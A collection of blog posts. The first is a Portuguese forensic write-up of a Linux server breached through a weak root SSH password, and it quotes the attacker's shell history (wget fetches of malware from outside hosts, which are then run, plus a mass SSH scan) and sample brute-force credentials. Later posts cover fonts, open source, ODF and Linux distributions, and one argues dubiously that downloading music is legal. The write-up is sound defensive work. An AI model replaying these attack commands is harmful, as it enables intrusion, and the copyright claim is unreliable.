Pronto. Estava constatado que esse tal comando crontabs era alienígena e não deveria estar ali. Foi, com certeza, implantado pelo cracker. Mas não paramos aqui. Queríamos saber o que este programa fazia. Como era um binário, tentamos extrair algumas strings dele:

bash$ strings /usr/bin/crontabs
[...]
"smbd -D"
"(swapd)" &
[...]

Ou seja, era este tal crontabs que mandava para a tela as mensagens com a string “(swap)”. Mas descobrimos outra coisa: o alienígena continha também a string “smbd -D”, que se parece com o nome do serviço do Samba. Nem perdemos tempo usando os comandos ps e top para verificar se um processo chamado smbd estava rodando porque usamos os mesmos rpm -qf e rpm -V para constatar que estes programas também foram modificados pelo cracker. Usamos o utilitário gráfico ksysguard (que não foi modificado) do KDE e pudemos observar um tal processo smbd -D rodando. Chamou a atenção que o ksysguard mostrava todos os processos executando sem seus parâmetros, e somente o smbd apresentava um parâmetro. Não tardou a acharmos um arquivo chamado “/usr/bin/smbd -D” (com espaço e parâmetro mesmo), e o RPM novamente nos informou que ele não fazia parte de nenhum pacote. Tratava-se de outro programa do cracker. Fomos lá tentar extrair mais algumas informações sobre este programa:

bash$ strings “/usr/bin/smbd -D"
[...]
Received SIGHUP; restarting.
Generating new %d bit RSA key.
RSA key generation complete.
   -b bits    Size of server RSA key (default: 768 bits)
By-ICE_4_All ( Hackers Not Allowed! )
SSH-%d.%d-%.50s
This server does not support your new ssh version.
Sent %d bit public key and %d bit host key.
sshd version %.100s [%.100s]
[...]

Omitimos diversas linhas para ser mais didático. A linha vermelha eliminou qualquer dúvida se um cracker havia visitado a máquina ou não. Mas o mais interessante são as linhas azuis, que levaram a crer que o famigerado programa smbd -D era um servidor SSH. O cracker deveria querer isso para manter um backdoor aberto, e poder logar com SSH quando quisesse. Em /var/log/messages encontramos a evidência final:

Feb  19 19:24:49 localhost smbd -D: RSA1 key generation succeeded
Feb  19 19:24:50 localhost smbd -D: RSA key generation succeeded
Feb  19 19:24:51 localhost smbd -D: DSA key generation succeeded
Feb  19 19:24:51 localhost smbd -D:  succeeded

Essas são mensagens típicas de um daemon SSH sendo executado pela primeira vez, quando cria suas chaves únicas de criptografia, só que bizarramente emitidas por um suposto programa com nome de Samba, o que não faz sentido algum e é forte indício que há algo errado no sistema. Ou seja, o cracker implantou um backdoor SSH, porém com um nome mascarado para seu arquivo e processo (smbd). A partir desses registros pudemos também estimar a data em que a máquina foi atacada: 19 de fevereiro.

Para o cracker poder alterar arquivos e comandos tão importantes do sistema, ele deve ter conseguido acesso de root, e por isso fomos espiar o histórico de comandos executados por este usuário no arquivo /root/.bash_history, e vimos isto:

bash# less /root/.bash_history
[...]
cd /usr/share/.a
wget lamisto.octopis.com/mig.tgz
tar xzvf mig.tgz
./mig g-u root -n 0
./mig -u root -n 0
cd /usr/share/.a
wget utilservices.iasi.rdsnet.ro/~marianu/flo.tgz
tar xzvf flo.tgz...linhas omitidas...
cd /var/tmp
wget djanda.com/get/usr.tar.gz
wget djanda.com/get/x.tar.gz
tar xfvz usr.tar.gz
cd usr
chmod +rwxrwxrwx *
./crond
cd ..
tar xfvz x.tar.gz
cd x
chmod +rwxrwxrwx *
mv unix x
./x 201.20; ./x 201.21; ./x 201.22; ./x 201.23; ./x 201.24; ./x 201.25; ./x 201. 26; ./x 201.27; ./x 201.28; ./x 201.29; ./x 201.30; ./x 201.31; ./x 201.32; ./x 201.33; ./x 201.34; ./x 201.35; ./x 201.36; ./x 201.37; ./x 201.38; ./x 201.39; ./x 201.40; ./x 201.41; ./x 201.42; ./x 201.43; ./x 201.44; ./x 201.45; ./x 201. 46; ./x 201.47; ./x 201.48; ./x 201.49; ./x 201.50
[...]
/usr/sbin/adduser scanning

O formato do arquivo não permite saber quando esses comandos foram executados, mas fica evidente que o cracker criou um usuário chamado scanning, baixou arquivos de certos sites, abriu-os e executou comandos que vieram com eles. Analisamos cada um, e descobrimos que:

  • No diretório /usr/share/.a ele instalou e executou o tal comando mig que aparentemente é um limpador de histórico de login do sistema. Usamos o mesmo comando strings para analisar esse binário. Isso confirmou nossa estimativa da data de ataque pois o comando last (usado para verificar esse histórico) apontou dados inconsistentes por volta de 19 de fevereiro.
  • Em /var/tmp foi baixado um tal usr.tar.gz, que aparentemente é um bot de IRC. Mais tarde, com os mesmos comandos do RPM, descobrimos que o comando /bin/netstat também foi alterado, provavelmente para esconder as conexões deste bot a diversos servidores de IRC na porta padrão 6667, o que constatamos com o ksysguard. Adiante explicaremos o que um cracker faz com isso.

Mas o mais interessante foi o x.tar.gz baixado. Continha dois executáveis chamados find e take, o script chamado simplesmente de x, e um arquivo muito especial de nome code.conf. Lendo o simplíssimo script x, vendo no histórico como ele era executado muitas vezes, e usando a intuição, ficou claro que o comando find varria faixas IP inteiras em busca de portas 22 (SSH) abertas. Os hosts encontrados eram então passados para o comando take, que se encarregava de usar as 18459 combinações de usuário e senha disponíveis no arquivo code.conf para tentar se logar nas máquinas encontradas. Um login bem sucedido tinha o IP, usuário e senha registrados num arquivo que indicaria ao cracker as próximas máquinas a invadir. E sim, este arquivo já tinha uma lista de hosts e respectivas senhas em que essas ferramentas conseguiram penetrar.

Foi exatamente esse procedimento de login por força bruta que foi detectado pelo IDS da empresa B, quando o servidor deles tentou ser invadido sem sucesso.

Quando chegamos a isso, ainda não estava claro como a máquina de A foi invadida. Estava checando se e como os administradores da máquina seguiram meus conselhos informais de segurança, verificando as regras de iptables, serviços ativos, etc. Parecia tudo correto, ou não alarmantemente errado. Foi quando demos uma olhada com mais atenção no conteúdo do code.conf e entre suas mais de 18 mil linhas encontramos estas:

root passw0rd
root pa55word
root pa55w0rd
sapdb sapdb
apache apache
apache 123456
apache2 apache
apache2 apache2
apache2 apache123

Enquanto varríamos o arquivo com os olhos, de repente o administrador da máquina colocou a mão na testa, e com voz de lamento nos contou que a senha de root era a manjadíssima passw0rd (com um algarismo zero no lugar da letra ‘o’)! O serviço SSH estava aberto e permitia login do root pela rede. Aquela máquina também tinha sido vítima do scan do cracker, e foi assim que ele entrou e ganhou poder total.

Eu conhecia várias máquinas formais e informais que implementaram aquele mesmo esquema de segurança que foi sugerido, estavam anos conectadas à Internet, e nunca sofreram ataques. Mas uma simples senha conhecida, bem típica de ambientes de testes onde várias pessoas compartilham acessos similares e informais às máquinas, foi o calcanhar de Aquiles da pilha de segurança. Isso confirma que ataques bem sucedidos são sempre responsabilidade do administrador, e nunca do software de segurança em especial.

A Reinstalação da Máquina

Depois de um ataque como esse, e depois do relatório conclusivo, a melhor coisa é limpar completamente o disco e partir para uma reinstalação completa. Desta vez acompanhei de perto a instalação, e seguimos algumas regras simples de segurança:

  • Só instalamos pacotes que sabíamos que seriam usados. Descartamos completamente a idéia de fazer uma instalação completa.
  • Depois de instalado, desligamos alguns serviços que sabíamos que não seriam usados, como NIS, Samba, Portmap, NFS. E se possível os desinstalávamos.
  • Criamos regras para o iptables fechando praticamente tudo menos as portas 80 (HTTP) e 443 (HTTPS).
  • Requisitamos ao provedor do link P que configurasse regras semelhante em seu roteador, formando um firewall duplo.
  • Por via das dúvidas, desabilitamos o acesso por SSH ao root, obrigando o administrador a se logar com um usuário qualquer e depois ganhar privilégios com o comando su. Isso funciona como uma restrição dupla para administrar a máquina.
  • E dessa vez foram usadas senhas decentes, bem difíceis, com letras, números, e que não eram derivadas de palavras óbvias.
  • As senhas só foram informadas verbalmente para poucas pessoas. Evitamos passar por e-mail.

Por que o Cracker Ataca ?

Uma coisa que vale explicar é o bot de IRC. Ele serve para fazer ataques de DDoS (Distributed Denial of Service). Um bot fica constantemente conectado a uma sala de IRC pré-definida. Depois de invadir várias máquinas e ativar os respectivos bots, o cracker entra nessa sala de IRC e tem ao seu dispor um exército de bots distribuídos programados para executar ações ao seu comando. O DDoS acontece quando o cracker, via comandos aos bots na sala de IRC, faz os computadores invadidos enviarem simultaneamente grandes pacotes de dados para algum site-vítima, escolhido pelo cracker. Naquele momento, o link do site-vítima fica sobrecarregado, e a sensação é que ele está fora do ar. Isso pode durar o tempo que o cracker desejar.
Ataque Distributed Denial of Service

Esse processo foi ricamente detalhado pelo dono de um desses site-vítima, em grc.com/dos/grcdos.htm, e é leitura obrigatória a qualquer um que se interessa por segurança.

Em todas as análises que fizemos, não encontramos nada de útil no ataque do cracker. A máquina estava conectada a outras redes, mas não pareciam interessá-lo. A única conclusão que pudemos chegar é que o cracker ataca por atacar, e depois usa seu ataque para atacar mais. Só. Simplesmente isso. Sim, porque as ferramentas, técnicas e rastros deixados mostram que ele provavelmente usou ferramentas criadas por outros, talvez seguindo uma documentação que mostra os comandos prontos, passo a passo. Sem saber direito o que estava fazendo. Sem objetivos “mitnickianos”, nem financeiros, nem algo que o exaltasse perante outros crackers.

Só Freud explica…

Freetype with Bytecode Interpreter

I am the maintainer and writer of most of the official Linux Font-HOWTO [official home], and one of its main points is to explain what is the TrueType Bytecode Interpreter.

I spent some time this morning updating the freetype package on my system [get RPMs], compiling it with support to BCI, and I took the chance to get some “before & after” screenshots of Konqueror browser accessing Google Mail with and without BCI.

Check it out. This is better than makeup ads:

Before: Original Freetype lib without BCI After: New Freetype RPM compiled with BCI
freetype4-nbci.png freetype4-bci.png
freetype1-nbci.png freetype1-bciaa.png freetype1-bci.png
freetype2-nbci.png freetype2-bciaa.png freetype2-bci.png
freetype3-nbci.png freetype3-bciaa.png freetype3-bci.png

After switching to BCI-enabled freetype, the use of Webcore fonts without anti-aliasing gives much much much better results, as you can see. Unfortunately these fonts are not free, but they are better than the popular Bitstream Vera fonts because they include hinting information.

BTW, anti-aliasing is useful in 2 situations only: if you are rendering fonts in big sizes (bigger than 13px), or if you have bad, non-hinted fonts (as Bitstream Vera) with a bad font rendering library (as Freetype without BCI support). If you have good hinted fonts and a good rendering library (as Freetype with BCI), restrict anti-alising only for big font sizes.

My Podcasts

A podcast is a blog that, in addition to text, also publishes media files. So you need a special “reader” to listen them, so people use softwares like iTunes, Amarok, iPodder to subscribe and automatically get the media.

I’m officially releasing my podcasts here, posting songs in high quality MP3 format. These are the channels, subscribe using the orange buttons below:

Enjoy.

Sobre Podcast

Uma vez perguntei a um amigo o que é um podcast, e ele disse que é um MP3. Bem, isso é tão minimalista quanto dizer que um Gaudí é um amontoado de tijolos, ou que a Internet é uma porção de bits dançantes.

Um podcast é um blog não-textual. Seu conteúdo pode ser audio e/ou vídeo, rodeado por metainformações do tipo “autor”, “entrevistado”, “banda”, “estilo”, “sumário” etc.

Como todo blog, ele tem regularidade: “episódios” no lugar de posts e assim por diante.

Você “assina” um podcast como assina uma revista, da mesma forma como assina um blog (via RSS ou ATOM). Mas como um browser é um leitor essencialmente textual, é mais comum e prático assinar podcasts usando softwares de mídia: iTunes, Yahoo! Music Engine, Amarok, etc.

Na convergência das coisas, um podcast pode ser comparado a um programa de rádio onde o próprio ouvinte decide quando e como vai ouvi-lo.

Num mundo onde tivermos banda larga no ar tão abundante e livre quanto ondas de rádio, além da memória para freqüências de estações, os rádios de nossos carros terão também a assinatura de nossos podcasts preferidos. Com ainda não chegamos a isso, temos que usar MP3 players modernos como o iPod – que tratam podcasts de forma especial – para termos essa funcionalidade.

E nesse mundo, os podcasters seremos você e eu, pessoas comuns falando diretamente para o mundo. Publicar um podcast é tão simples quanto publicar posts num blog. É inclusive algo que se pode integrar com plataformas de blogs comuns, com plugins para WordPress, etc.

Se você tem um fluxo de coisas para dizer, crie um podcast. Se você tem um fluxo de coisas para serem assistidas, crie um podcast. Se você tem um fluxo de coisas que quer que as pessoas ouçam, crie um podcast. Este último é o meu caso, sobre Jazz Brasileiro, e por isso estou juntando os pedaços e os módulos para criar um.

Andei estudando isso ultimamente, e achei importante compartilhar…

HD de 1 Terabyte, para quem ?

Vão anunciar o HD de 1 Terabyte.

Tempos atrás, fiz um estudo sobre clusters de alta disponibilidade e a certa altura levantei o sizing real de storage de aplicações de servidor. O resultado está aqui:

Sizing

Adicionando a essa lista, lembro quando a DBA de um grande e famoso supermercado online me chamou para mostrar que a RAM do servidor do DB (1.5GB) era maior que o próprio DB (1GB), que incluia lista de todos os produtos, todos os clientes, todos os carrinhos que já passaram por lá, e tabelas de controle.

Instalações oversized é algo muito comum hoje em dia porque arquitetos costumam usar sua sensibilidade de uso de desktop ao definir RAM, storage, CPU etc de um servidor.

Bem, saibam que desktop é uma das coisas que mais exige RAM, disco (em velocidade e tamanho) e CPU, porque é onde o usuário é mais sensível a atrasos no tempo de resposta (a famosa ampulheta), e tem sempre muita multimídia para aramazenar e tocar.

Aplicações de server são em geral muito mais leves, salvo algumas poucas exceções.

Um HD de 1 terabyte, hoje, faz muito mais sentido para uso pessoal do que em server. Mas é a tendência natural das coisas, e não vamos puxar o freio de mão para esse crescimento (e barateamento), não é mesmo !?

Open Source na Prática

O primeiro a propor a idéia de Open Source Software (OSS) foi Richard Stallman na década de 1970, que a formalizou, com a ajuda de alguns advogados, na famosa licença GPL.

Ninguém se interessou ou sequer ouviu falar sobre isso, até que em meados da década de 1990, tudo mudou com a vertiginosa popularização do Linux, sistema operacional OSS.

O termo popular “Software Livre” não é a melhor tradução de Open Source Software, cujo correto é Software de Código Fonte Aberto. É importante notar isso porque muitas vezes o termo é erradamente associado a idéia de não-proprietário, ou não-comercial. A verdade é que um software pode ter seu código fonte aberto mas ser comercial e/ou proprietário e vice-versa, portanto são conceitos que não devem ser confundidos.

A idéia é simples: eu escrevo um programa e você pode copiá-lo à vontade sem nem sequer me notificar. Pode inclusive modificá-lo e redistribuí-lo, contanto que também mantenha suas modificações abertas e informe qual a origem e os autores anteriores do software.

Isso não quer dizer que teremos diversas versões desconexas do mesmo software, num dado momento. Cada modificação passa por um processo muito bem organizado de aceitação ou rejeite, onde boas melhorias retornam à base e são incorporadas à nova versão do software. Na verdade, hoje, a maioria dessas contribuições não é mais feita por indivíduos, mas por empresas de tecnologia.

É comum — e errado — pensar que OSS significa a morte de todo software de código fechado. Isso não acontece porque a tendência é que as grandes inovações continuem a ser exploradas pelo modelo fechado. Imagine um mundo hipotético que ainda não conhece editores de planilhas. É natural que, ao lançar esse produto, seu inventor opte pelo modelo de código fonte fechado, para maximizar seus lucros através do total controle de sua invenção. Contudo, conforme essa invenção se populariza, desenvolve um mercado e adquire concorrentes, OSS surge como uma das formas — a mais inovadora — para repensá-la. OSS inova ao reimplementar o que outros inventaram e exploraram anteriormente. Recentemente, porém, a indústria começou a usar OSS diretamente para lançar certas inovações, justamente pelo seu poder de agregar comunidades e criar ecossistemas.

Também é comum — e errado — acreditar que se o software em si é gratuito, elimina-se por completo os gastos. Mas sempre haverá a necessidade de um suporte confiável. OSS altera o eixo do valor agregado do software, movendo-o do software em si (que não custa nada), para o serviço de suporte.

Open Source, Open Standards relacionados a TI

Em seu processo de amadurecimento, a única diferença prática entre um software OSS e outro de código fonte fechado é a ordem em que as coisas acontecem. Um fabricante comercial terá que criar estrutura e suporte regional antes de vender o produto. Já no OSS, ofertas de suporte só surgem (espontaneamente) depois que ele goza de uma boa gama de usuários. Mas seja qual for a ordem, a única coisa que garante maturidade a qualquer software ou produto é um ciclo de desenvolvimento–uso–suporte, que estimula mais desenvolvimento. Somente essa maturidade garante a aceitação do produto em empresas responsáveis. E hoje, OSSs como Linux, Apache, OpenOffice.org, Samba, e outros já gozam desse ecossistema cíclico de uma forma vasta, global e vigorosa.

Hoje, OSS tem aplicações mais maduras em infraestrutura e alguns nichos de middleware. Por sua vez, os softwares de código fonte fechado apresentam maior desenvoltura mercadológica nas funcionalidades de maior valor agregado ao negócio (ERPs, CRMs ou processos empresariais). Isso porque estas funcionalidades têm uma amplitude menor de usuários, o que inviabiliza o surgimento de suporte espontâneo — fator vital para a maturidade do OSS.

A indústria tem buscado um balanço saudável para misturar componentes fechados com OSS, a fim de maximizar o seu benefício sem abrir mão da maturidade de ponta a ponta. Prova disso é que tem sido cada vez mais comum a implantação de ERPs maduros — geralmente de código fechado — sobre plataformas abertas maduras — como distribuições Linux com suporte.

A receita para o melhor balanço é insistir no uso de Padrões Abertos. Por garantirem uma interoperabilidade fácil entre camadas abertas e de código fechado, o uso de padrões amplia as escolhas e a liberdade da empresa que compra TI para compor a melhor mistura do momento, com opções OSS e/ou de código fechado.

IBM e OpenDocument Format

A IBM apóia o uso de OpenDocument Format – o padrão aberto para documentos de escritório, e o formato usado pela suite OpenOffice.org, KOffice, Corel WordPerfect Office, e outros.

Estamos num processo interno gradativo de migração para ODF, e falamos da importância disso com governos e clientes, globalmente. Nossos produtos suportam ODF no sentido de consumir e gerar documentos nesse formato.

Uma das vozes mais conhecidas é o blog do Bob Sutor, executivo de padrões da IBM que dá muito foco para ODF. Aqui no Brasil temos o Cezar Taurion, eu e outros fazendo esse papel.

E finalmente vimos o Brasil tomando a liderança na América Latina, recomendando o uso de ODF como formato preferido para documentos do governo.

Semana passada divulgamos o seguinte press release:

Brasil incentiva a utilização do formato OpenDocument

Aliança ODF também é reconhecida por países da Europa e Ásia

São Paulo, 13 de dezembro de 2006 — A OpenDocument Format Alliance (Aliança ODF), que reúne grande número de organizações, instituições acadêmicas e representantes da indústria com o objetivo de melhorar o acesso aos documentos eletrônicos de governo, elogiou a decisão do Brasil de recomendar a ODF como o formato preferido do governo. A Aliança também parabenizou a decisão da Índia de usar a ODF em um grande órgão do governo estadual e a decisão unânime da Itália de reconhecer a ODF como padrão nacional.

A Aliança ODF expressou, ainda, seu apoio à predisposição da China, Coréia e Japão de requerer um “formato de documento internacional e baseado em padrões abertos”, além de reuniões de planejamento de TI e fonte aberta celebradas em forma conjunta anualmente pelos governos dos três países. A Polônia também foi elogiada por demonstrar sério interesse na adoção da ODF após uma reunião nacional celebrada para seu governo com grande número de participantes da indústria e organizações sem fins lucrativos.

Com a publicação da versão 2.0 do e-Ping Interoperability Framework, o Brasil se transforma no primeiro país da América do Sul que recomenda oficialmente a ODF. O quadro estabelece que todos os arquivos .xls, .doc e .ppt se encontram em transição, ou seja, que já não cumprem com suas políticas técnicas, e que a ODF é agora o formato recomendado oficialmente pelo governo do Brasil. O Instituto Nacional de Tecnologia e Informática, o Ministério da Defesa e o Governo do Estado do Paraná, no Brasil, são membros da Aliança ODF.

“2006 acaba de maneira tão auspiciosa como começou, com legiões de governos no mundo inteiro expressando verdadeiro apoio à ODF”, disse Marino Marcich, Diretor Executivo da Aliança ODF. “Parabenizamos o Brasil, a Índia, a Itália, o Japão, a Coréia, a China e a Polônia por reconhecerem a ODF, cada país a seu modo, e estamos ansiosos por ver o impulso contínuo deste movimento no ano que vem.”

Na Índia, o governo ordenou usar arquivos ODF para o escritório de impostos comerciais do governo estadual de Delhi. Além disso, a Itália se une a países como a Malásia, que têm a intenção de reconhecer a ODF como padrão nacional (consultar www.uninfo.polito.it), enquanto o Japão, a Coréia do Sul e a China pensam em usar exclusivamente formatos de documentos internacionais e baseados em padrões abertos como a ODF para reuniões celebradas por seus diretores gerais de Tecnologia e Informática, a fim de debater e promover o software de fonte aberta.

A Aliança tem crescido a mais de 400 membros em mais de 40 países, mostrando um impulso sustentado para o formato de arquivo aberto em nível mundial.

Para obter informações adicionais sobre a ODF Alliance vá para www.odfalliance.org.

Sobre a IBM
Para mais informações sobre a IBM, visite www.ibm.com/br.

Wireless iPod

AirPlay2Tentando me desfazer dos anti-sociais-fones-de-ouvido, fui na onda de comprar um transmissor FM para o iPod que ganhei de aniversário.

Para quem não sabe o que é isso, trata-se de um dispositivo que se pluga ao iPod e que transmite o que ele toca para um rádio, por ondas de FM.

Minha dica é: não perca seu tempo com isso. Testei vários e todos são ruins. Sim, você consegue ouvir no rádio o que o iPod toca, mas sempremuito chiado, e só funciona a poucos centímetros do rádio, o que não é prático.

Irritei-me e devolvi hoje para a loja.

Evento Connect and Play 2006

Connect and Play 2006Terça-feira, 12 de dezembro realizaremos o evento Connect and Play focado para desenvolvedores.

A inscrição é gratuita em www.concursoinsites.com.br, e os participantes são convidados a doar 1kg de alimento não perecível que será entregue a uma organização social e educacional.

Teremos as seguintes palestras e atividades:

  • Technical Briefing: Accelerating Global Software Delivery (Alfredo Gutierrez – Developer Relations Manager – Developer Technical Marketing)
  • Technical Briefing: SOA Governance (Randel Powell – World Wide IDR Developer Skills Team)
  • Keynote Speaker – Nosso Futuro Digital: o impacto das Tecnologias da Informação e da Comunicação (TCIs) na Vida Humana (Ethevaldo Siqueira – jornalista especializado em Tecnologia da Informação e Telecomunicações, colunista do jornal “O Estado de S. Paulo” e da Revista Veja e comentarista da Rádio CBN.)
  • Open Document Format (César Taurion – Gerente de Novas Tecnologias Aplicadas)
  • Acessibilidade (Omar Varela – Gerente do Centro de Acessibilidade IBM)
  • Minicursos: RSA e WebSphere
  • Certificações: WebSphere, SOA, XML e DB2
  • Linux Install Fest – Instalação monitorada do SUSE 10 da Novell

Teremos também a exposição dos trabalhos finalistas do Consurso IBM InSites.

Internet Music Download

It is very controversial if it is illegal or not to download music from the Internet. The law and license to use a phonogram (a CD track) is not clear for the masses, or nobody never explained it precisely.

Understand the Context

I met a professional musician once that was studying musical production in the university, and he outlined some aspects very clearly:

  1. The great recording companies provide a service for the society in this ways: finding talents, funding the production and recording of the phonogram, producing a nice CD booklet, advertising the product on TV, radio, magazines, outdoors and operating the physical distribution logistics of the CD, all of this for you to listen high technical quality music, and easy to find in a store near your home. So nothing is more fare for the recording companies to get their financial share.
  2. Because of this a recording company is, in general, the owner of the phonogram (a CD track), and not the musician or composer. That means that the company decides when, how much and how they will publish these songs (publish means to create CDs and put them in stores). The musician can’t take a phonogram on which he participated on the recording, put it on a media (CD, tape, DAT, long play, etc) and start selling it, unless he buys the rights over the phonogram, that are, in general, very expansive.
  3. The recording industry and companies are not defending the artists rights, but their own interests. In fact, many artists do not like that the recording companies say they are defending their rights.
  4. In all this commercial process, musicians share come from their authorship rights (which is small, according to some musicians I know), that comes from an independent institution, which in its turn comes from the recording company and other sources. This rule is not the same for big stars that have enough power (and agents) to negotiate better contracts with a recording company.
  5. The musician wants his art to be known and listened in the broadest way possible.
  6. Professional musicians earn more money making shows and live performances, and less in the process of selling recording company’s CDs that carry his creations.
  7. People will only pay for show tickets if the artist’s creation is good and well known.
  8. Many good artists don’t have market penetration, money or disposition to record CDs in a way that they will own the phonograms (the so called independent way). These are usually referenced as “alternatives”.
  9. Excellent musicians and beautiful phonograms can be unknown to the point it is considered not viable to give them space in a CD store shelf. Because of that it is difficult to find old recordings or the so called “alternatives” in stores: or people already changed their taste, or the number of people will buy is very small.
  10. I estimate the cost to mass produce one single CD — including the plastic, media, booklet and its artwork, authorship rights, some advertisement etc — in about US$2.
  11. I heard that the law prohibits the redistribution of phonograms (CD tracks) in a physical media (to burn a CD or tape and start selling or buying it).
  12. The Internet is not considered a physical media. So in this rationale, by law terms, it is not prohibited to use the Internet as a way to distribute music, at least for phonograms produced/recorded before the Internet era, which includes everything before around 1997. After that, phonograms started to be produced with a revised license (the law terms of what is permitted or not to do with it) that considered the Internet.

Whatever they say, to download music from the Internet takes time, comes without the booklet — which contains a lot of art and valueable information — and is controversial if it is illegal or not. On the other hand, artists and their full high-fidelity discographies have been seen in such a way that seems not rational not to download.

You should decide if you follow what the media says defending their rights — and not the artists’s —, or if you are going to give prestige to a musician and feel all its creative potential can make with your emotions.

How to Download

I opened this space for a friend to explain how to do it. This method uses the Bit Torrent technology and these are the steps to successfully use it:

  1. Download and install some Bit Torrent software as BitComet (only for Windows) or Azureus (Mac, Linux, Java, Windows). These software are free, safe, will not install spyware, virus, malware etc, and their use is completely legal.
  2. Use the www.isohunt.com website to find music by name, artist, etc. It can be used to find also other types of files. You can also search the Internet for other sites that provides “torrents”.
  3. Search, for example, for “Mozart” or “Bach“, etc. Click on these links to see a search result example.
  4. You will find complete collections and very large files, that takes sometimes days to download. The first results isohunt will show are the most active downloads, and because of that faster to download.
  5. Select the item you want, it will expand, and then click the link called “Download Torrent” to start the download.
  6. This will trigger the Bit Torrent software (BitComet of Azureus you downloaded above), that will ask you where you want to download. Choose a directory that you will remember later.
  7. Before selecting OK, you will see a list (huge if it is a complete collection) with the files included in the torrent, and you can select only the files you want, or everything.
  8. Monitor the download activity and guarantee you are downloading in a good speed. If it is constantly slow for a long time, it is usually better to cancel and search for another download.
  9. Even very fast downloads can take days to be fully retrieved if it is big.
  10. After the download finishes, if you use Linux, use Musicman to organize your retrieved files.

Be responsible and good luck.

Choosing a Linux Distribution

It is important to begin by saying that all Linux distributions, including commercial — Red Hat Enterprise Linux, SUSE, Xandros, etc — as well as non-commercial — Debian, Slackware, Gentoo, etc — are all good and are technically able to fulfill most real world needs. To choose amongst them is more related to personal taste of the people who already knows it than to functionality. But a company must think about other aspects — not only taste — to guarantee making the right strategic choice for long term benefits.

Support and Certification

All Linux distributors package, in one way or another, mostly the same set of Open Source softwares (the Kernel, Apache, Samba, libraries, Gnome, KDE, etc). But only the so called enterprise distributions include support services together with their product.

For a user, support really means:

  1. A partner available now and in the long term to transfer operational risks.
    This is the most important point. Companies don’t want to take risks — specially the Open Source risks — for themselves.
  2. Fast access to quality updates.
    Companies in general have limited resources to compile, test and apply OSS updates.
  3. Access to a large set of certified hardware (IHV) and software (ISV) vendors, and availability of pre-tested complex solutions.
    A critical part of any IT project is the support and certification connections between its components (hardware, storage, middleware, etc). The most important and valued function provided by a distributor, even more so than the embedded technology in the OS, is its ability to build ecosystems of certified Independent Hardware and Software Vendors.

Price for a License Versus Subscription Business Models

Companies that sell commercial software (as Microsoft, IBM, Oracle, etc) allow somebody to use their products only after buying the rights to. This “buyable rights” are refered to as a commercial license.

The software provided in any Linux distribution is free of charge. The developers of these softwares have licensed their work under the GPL, BSD, Mozilla Public, IBM Public or some other Open Source licenses, which grants anyone the rights to use and redistribute the software without having to pay any money.

It is a misnomer to say that you are “buying� some Linux distribution (or a license for it to be used). You can’t buy it. It is already yours, in practical terms. It is like saying a user is buying the content of some web site. There is nothing material to acquire. On the other hand this user can subscribe to a service that provides hot line support, access to updates and access to an ecosystem of interoperable certified products and solutions – the support points outlined above.

So enterprise Linux distributors (such as Red Hat, Novell, Xandros) sell these services, and not the software, because the last is free of charge.

Choosing the Best Distribution

There are two responsible and effective ways to use a Linux distribution as part of a company’s IT operations:

  1. Acquire a global commercial Linux subscription such as Red Hat Enterprise Linux or Novell SUSE Linux Enterprise Server.
    A subscription ties together the Open Source software and its global scale support, providing a stable environment for a certified ISV and IHV flourishing ecosystem.
  2. Use free distributors such as as Debian or Slackware and buy support services from an independent local company.
    Free distributions may introduce more risk due to non-global support operations, in addition to a loose integration between software and support, which leads to a weak ISVs and IHVs ecosystem.

In terms of technical flexibility and vendor choice — points that influence cost —, both options are equal. All the benefits of the second option are present in the first, while second lacks the ecosystem aspects.

Thus the conclusion is that it is more reasonable to directly acquire a product that directly ties the support to the software, than manually integrate them at the regional level.

RHEL versus SLES comparison

Companies should look at the following points, in this order, when choosing a Linux distribution to run their business applications:

  1. Which distribution vendor do I have closer commercial relationship?
  2. Who has best pricing model for the value provided?
  3. Which distribution does my technical staff have more experience with?
  4. Which distribution is supported and certified by my providers of hardware and software?
  5. If you are unsure, be responsible and use an enterprise distribution.

There are two enterprise Linux distributors that have a strong ecosystem and penetration in the market: Red Hat Enterprise Linux and Novell SUSE Linux Enterprise. They have differences that every year continue to converging and diverge. See the table for a comparison.

Other Enterprise Distributions

There are several Linux distributions with business models similar to the one adopted by Red Hat and Novell. Most well known are Ubuntu (technically based on Debian), Mandriva (Conectiva and Mandrake fusion), Xandros (also based on Debian.) They are focused on building a product that can scale globally in such a way that support services can be delivered automatically or as a self-service.

There is an intrinsic market law that seeks equilibrium by providing two options in which to choose. One option may be good (there is actually no option when only one path is available), two mature options is better, and three or more options are too much for the market to handle. It appears that the market has already defined its two mature options: Novell and Red Hat.

Even if these other enterprise distributors have better products, they’ll have to spend a considerable amount of energy developing an ecosystem of ISVs and IHVs. More than that, ISVs and IHVs will have to take a break in their operations to listen to what these new distributors have to offer.

Ecosystem is everything. A product with a good ecosystem can easily become much better than an excellent product without an ecosystem. This is probably the most important aspect a company should consider when choosing a Linux distribution.

One cannot say that a certain distribution is better than all others. When searching for a distribution one should be pragmatic in striking a balance between the distribution’s functions and how well it meets the goals of the company or specific project.

Padrões Abertos e Linux no Desktop

Hoje a indústria usa o sistema operacional de desktop de praticamente um único fornecedor, cria aplicações gráficas 100% dependentes dele, e usa uma suite de escritório que também só funciona sobre esse mesmo sistema operacional. Ainda por cima, os documentos de formato proprietário com que o mercado usa só podem ser gerados e consumidos por essa mesma suite.

Se nossos CDs de música tocam em qualquer CD player, por que nossas aplicações, páginas da web, documentos, etc não podem ser usados em qualquer sistema operacional, plataforma de hardware, etc ?

A demora para isso acontecer reflete quão dependente dessas tecnologias proprietárias é o mercado. Isso é caro principalmente porque não há com quem negociar alternativas, e por isso essas tecnologias terão o preço que seu fornecedor quiser.

A IBM ainda está analisando o direcionamento futuro dos nossos desktops internos para funcionários. Não foi decidido entre Linux ou Vista, nem Darwin, nem BSD, nem nenhum outro sistema operacional.

Temos iniciativas internas fortíssimas para que os produtos e serviços de nossa Intranet sigam Padrões Abertos. Dessa forma, um funcionário pode escolher o sistema operacional que melhor se adequar ao seu trabalho.

Não usamos uma tecnologia proprietária de impressão remota, e sim o serviço que usa Padrões Abertos para imprimir na rede.

Não usamos uma aplicação proprietária de VPN, mas o serviço de VPN que usa Padrões Abertos.

Não temos um serviço de diretórios de uma implementação proprietária, e sim um diretório corporativo baseado no Padrão Aberto LDAP.

Não usamos documentos de formatos proprietários, que só podem ser gerados e consumidos por uma única suite de escritório, mas reforçamos o uso do novo Open Document Format, baseado em XML, introduzido pelo OpenOffice.org, que pode ser aberto em qualquer suite de escritório.

E por aí vai….

